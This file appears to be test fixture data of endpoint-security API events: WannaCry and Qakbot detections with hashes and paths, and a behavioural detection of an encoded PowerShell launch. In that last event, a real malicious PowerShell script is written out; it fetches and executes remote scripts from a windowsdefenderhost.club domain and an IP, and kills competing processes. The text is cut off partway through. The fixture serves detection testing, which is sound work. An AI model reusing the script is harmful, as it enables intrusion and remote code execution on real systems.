+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot 
delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell 
Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","$ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
